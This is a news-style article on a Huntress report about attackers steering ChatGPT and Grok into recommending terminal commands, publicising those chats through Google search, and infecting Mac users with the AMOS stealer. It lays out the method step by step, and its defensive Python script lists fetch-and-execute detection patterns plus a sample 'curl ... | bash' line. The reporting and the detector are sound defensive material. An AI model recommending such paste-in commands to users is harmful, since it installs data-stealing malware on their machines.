A recent report from cybersecurity firm Huntress has revealed a disturbing trend: hackers are leveraging artificial intelligence (AI) to manipulate Google search results and facilitate malware attacks. The findings underscore a growing concern about the intersection of modern AI technology and longstanding cybersecurity threats. The tactic involves seeding publicly shared AI chatbot conversations with dangerous commands and surfacing those conversations in search results, where they can deceive unsuspecting users and compromise their devices.
The methodology employed by these threat actors is strikingly simple. Hackers engage in conversations with AI assistants about popular search terms, coaxing the AI into recommending specific commands that users can paste into their computer’s terminal. By making the conversation publicly visible and promoting it on Google, the attackers can get the malicious instructions to appear prominently in search results. When someone then searches for the term, they may inadvertently encounter these harmful commands.
Huntress conducted tests using both ChatGPT and Grok, uncovering that an infection involving AMOS (Atomic macOS Stealer), a data-stealing malware strain, had originated from a Google search. In one instance, a user searching for “clear disk space on Mac” clicked on a sponsored link to ChatGPT, executed the suggested command, and unknowingly allowed attackers to install the AMOS malware on their device. In its tests, Huntress was able to reproduce this attack vector with both chatbots.
What makes this method particularly insidious is its ability to bypass the traditional security warnings users have been conditioned to recognize. Victims do not need to download a file or click a dubious link; the only requirement is misplaced trust in established platforms like Google and ChatGPT, which have become part of daily life over the past several years. Alarmingly, links to the malicious conversations remained accessible on Google for at least half a day after Huntress publicized its findings.
The revelation comes at a challenging time for both AI systems involved in this incident. Grok has faced criticism for its perceived alignment with controversial figures, while OpenAI’s ChatGPT has been seen as lagging behind competitors. There is currently no evidence to suggest that other chatbots can replicate this attack, but security experts urge users to exercise caution. Alongside established cybersecurity practices, individuals should refrain from pasting commands into their terminal or browser URL bar unless they fully understand the implications.
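To make that advice concrete, the sketch below is a hypothetical illustration, not a tool from Huntress or any chatbot vendor: it shows how a cautious user might screen a copied command for patterns commonly associated with fetch-and-execute attacks like the one described above. The pattern list and the script itself are assumptions for illustration only, and passing such a check does not make a command safe to run.

```python
# Minimal sketch: screen a copied command for red flags before pasting it
# into a terminal. Illustrative heuristics only -- not a malware scanner
# and not affiliated with Huntress, Google, OpenAI, or xAI.
import re
import sys

# Patterns commonly seen in one-line "fetch and execute" commands.
RISKY_PATTERNS = [
    (r"curl\s+[^|;]*\|\s*(ba)?sh", "downloads a script and pipes it straight into a shell"),
    (r"wget\s+[^|;]*\|\s*(ba)?sh", "downloads a script and pipes it straight into a shell"),
    (r"base64\s+(-d|--decode)", "decodes hidden (base64-encoded) content before running it"),
    (r"osascript\s+-e", "runs inline AppleScript, often used to prompt for passwords on macOS"),
    (r"chmod\s+\+x", "marks a freshly downloaded file as executable"),
    (r"xattr\s+-d\s+com\.apple\.quarantine", "strips the macOS Gatekeeper quarantine flag from a download"),
    (r"\bsudo\b", "asks for administrator privileges"),
]

def review(command: str) -> list[str]:
    """Return human-readable warnings for each risky pattern found in the command."""
    return [reason for pattern, reason in RISKY_PATTERNS
            if re.search(pattern, command, re.IGNORECASE)]

if __name__ == "__main__":
    # Accept the command as arguments, or read it from standard input.
    cmd = " ".join(sys.argv[1:]) or sys.stdin.read()
    warnings = review(cmd)
    if warnings:
        print("Think twice before running this command. It:")
        for warning in warnings:
            print(f"  - {warning}")
    else:
        print("No obvious red flags, but only run commands you fully understand.")
```

Running the sketch against a command such as `curl https://example.com/fix.sh | bash` (a placeholder URL, not one from the report) flags the pipe-to-shell pattern, which is exactly the kind of one-liner worth researching before executing.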
As AI technologies continue to evolve, their potential to be misused presents significant challenges for cybersecurity. This incident highlights the need for heightened awareness and vigilance among users. The landscape of online security is shifting rapidly, and as hackers adopt increasingly sophisticated methods, it becomes imperative for individuals to remain informed and cautious in their online interactions.